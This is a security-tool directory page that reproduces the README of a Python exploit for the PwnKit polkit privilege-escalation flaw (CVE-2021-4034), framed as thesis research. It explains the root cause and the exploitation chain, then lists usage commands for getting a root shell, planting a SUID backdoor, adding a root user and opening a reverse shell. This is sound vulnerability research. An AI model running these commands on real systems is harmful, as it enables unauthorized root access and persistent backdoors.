Skip to content
KitploitKITPLOIT
ToolsBlog
Log in
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2021-4034 — Master's thesis research on CVE-2021-4034 (PwnKit) local privilege escalation. Multi-payload Python exploit with 7 modes including interactive shell, SUID backdoor, reverse shell, and root user creation. Includes root cause analysis and exploitation chain documentation. | Kitploit
Tools/GitHubGitHub/devianntsec/cve-2021-4034
Privilege EscalationMemory ForensicsVulnerability AnalysisExploitationPost-ExploitationPenetration TestingLearning & EducationRed TeamingPayload DevelopmentBinary Exploitation
GitHub
1536 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share
devianntsec/cve-2021-4034

CVE-2021-4034

Master's thesis research on CVE-2021-4034 (PwnKit) local privilege escalation. Multi-payload Python exploit with 7 modes including interactive shell, SUID backdoor, reverse shell, and root user creation. Includes root cause analysis and exploitation chain documentation.

View Repository

CVE-2021-4034 — PwnKit Local Privilege Escalation · Master's Thesis Research

Platform Language License: MIT Research CVSS

Memory corruption vulnerability in polkit's pkexec utility
Local Privilege Escalation → root via out-of-bounds write
Affected: polkit 0.105-31 and earlier · Patch: polkit 0.105-33 (January 2022)


Interactive root shell obtained via CVE-2021-4034 - PwnKit

Description

This repository contains my Master's Thesis research on CVE-2021-4034, a High-severity (CVSS 7.8) Local Privilege Escalation vulnerability in polkit's pkexec utility, commonly known as PwnKit.

The vulnerability originates from an out-of-bounds write in pkexec's argument processing logic. When pkexec is executed with an empty or crafted argv, it reads and writes beyond the bounds of the argv array into the envp array, allowing an unprivileged local user to inject malicious environment variables that are subsequently loaded as a shared library, executing arbitrary code with root privileges.

My Contribution

AspectDescription
Multi-payload exploitPython wrapper with 6 payload modes including shell, id, backdoor, and reverse shell
Automated environment setupAutomatic GCONV_PATH construction and gconv-modules configuration
Post-exploitation modulesSUID backdoor, root user creation, and custom command execution
Academic documentationRoot cause analysis, exploitation chain, and vulnerability timeline

Repository Structure

CVE-2021-4034/
├── README.md                        # This file
├── LICENSE                          # MIT License
│
├── exploit/
│   └── pwnkit.py                    # Advanced exploit with multiple payloads
│
└── docs/
    ├── screenshots/                 # Exploitation demonstrations
    │   ├── 01-pwnkit-shell.png
    │   ├── 02-pwnkit-id.png
    │   ├── 03-pwnkit-whoami.png
    │   ├── 04-pwnkit-backdoor.png
    │   ├── 05-pwnkit-add-user.png
    │   ├── 06-pwnkit-reverse.png
    │   └── 07-pwnkit-custom.png
    │
    └── analysis/
        ├── 01-root-cause.md         # Vulnerability root cause analysis
        ├── 02-exploitation-chain.md # Exploitation chain breakdown
        └── 03-timeline.md           # CVE timeline

Quick Start

Prerequisites

  • Linux system with vulnerable polkit (pkexec --version shows 0.105 or earlier)
  • GCC compiler (apt install gcc)
  • Python 3.6+
  • Standard user account (no root required)
  • Isolated VM recommended for testing

Usage

# Interactive root shell (default)
python3 exploit/pwnkit.py -p shell

# Verify execution context
python3 exploit/pwnkit.py -p whoami

# Execute custom command as root
python3 exploit/pwnkit.py -p custom -c "id"

# Create SUID backdoor at /tmp/.sh
python3 exploit/pwnkit.py -p backdoor_suid

# Add persistent root user
python3 exploit/pwnkit.py -p add_root_user --username backdoor --password mypassword

# Reverse shell
python3 exploit/pwnkit.py -p reverse_shell --lhost 192.168.1.10 --lport 4444

Payload Reference

PayloadDescriptionOutput
shellSpawns interactive /bin/sh as rootInteractive shell
idWrites id and whoami output to /tmp/pwnkit_id.txtFile
whoamiWrites UID/eUID verification to /tmp/pwnkit_root_testFile
backdoor_suidCreates SUID root bash copy at /tmp/.shPersistent backdoor
add_root_userAppends custom user to /etc/passwdPersistent access
reverse_shellConnects back to attacker via PythonRemote shell
customExecutes any command as rootStdout / file

Technical Overview

Vulnerability Root Cause

pkexec processes its own argv to locate the program being run. When invoked with argc == 0 (empty argument vector), the bounds check on argv fails silently. The subsequent out-of-bounds read treats envp[0] as argv[1], and the out-of-bounds write back into envp allows an attacker to replace an environment variable with a crafted path. When pkexec later calls g_printerr(), it loads GCONV_PATH from the now-attacker-controlled environment, loading an attacker-supplied shared library with root privileges.

argc == 0  →  argv[1] reads envp[0]
             argv[1] = "GCONV_PATH=."  (writes back into envp)
             pkexec loads ./pwnkit.so  (attacker-controlled shared library)
             gconv_init() executes as root

Exploitation Chain

1. Craft argv = { NULL }  →  argc = 0, triggers OOB access
2. Set envp[0] = "pwnkit.so:."
3. Set envp[1] = "PATH=GCONV_PATH=."
4. pkexec OOB-writes "pwnkit.so:." into envp[0] as if it were argv[1]
5. pkexec resolves GCONV_PATH=. and loads gconv-modules
6. gconv-modules maps "PWNKIT" charset to pwnkit.so
7. pwnkit.so:gconv_init() called with root privileges
8. Payload executes (shell / backdoor / reverse shell / etc.)

Key Technical Details

ComponentValueNotes
Vulnerable binary/usr/bin/pkexecSUID root
Trigger conditionargc == 0Empty argv
Write primitiveOOB write into envpVia argv[argc-1]
Load mechanismGCONV_PATH + gconv-modulesStandard glibc iconv
Execution contextgconv_init() in shared libraryRuns as EUID 0
Affected versionspolkit ≤ 0.105-31All major Linux distros

Demonstrations

Interactive Root Shell

Interactive Shell

ID Verification

ID Payload

Whoami Verification

Whoami Payload

SUID Backdoor

Backdoor Payload

Add Root User

Add Root User

Reverse Shell

Reverse Shell

Custom Command

Custom Payload


Empirical Testing

All testing was conducted on an isolated VirtualBox VM running Ubuntu 20.04 LTS with polkit 0.105-26 (vulnerable), with no network exposure.

Download Tool